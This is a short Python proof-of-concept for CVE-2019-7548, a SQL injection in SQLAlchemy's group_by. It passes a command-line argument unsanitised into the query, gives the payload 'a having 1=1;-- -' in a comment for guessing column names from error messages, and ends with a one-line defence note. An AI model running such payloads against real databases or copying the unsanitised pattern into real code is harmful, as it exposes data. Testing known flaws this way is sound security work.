#!/usr/bin/env python
# encoding: utf-8

"""
@author: zhanghe
@software: PyCharm
@file: CVE-2019-7548.py
@time: 2019-04-23 11:18
"""

import sys
from sqlalchemy import create_engine, String
from sqlalchemy.orm import Session
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer


# 建立连接
engine = create_engine('mysql://root:123456@127.0.0.1:3306/test?charset=utf8', echo=True)

# 建立会话
session = Session(engine)

# 声明基类
Base = declarative_base()


class SqlTest(Base):
    __tablename__ = 'sql_test'

    id = Column(Integer, primary_key=True)
    name = Column(String(255)),
    des = Column(String(255))


if __name__ == '__main__':
    # python app_backend/cve_poc/CVE-2019-7548.py "a having 1=1;-- -"
    # 猜字段名
    test_str = '' or sys.argv[1]
    print(session.query(SqlTest).group_by(test_str).all())
    # sqlalchemy.exc.OperationalError: (_mysql_exceptions.OperationalError)
    # (1054, "Unknown column 'a' in 'group statement'")
    # 防御措施: 屏蔽 sqlalchemy 错误明细
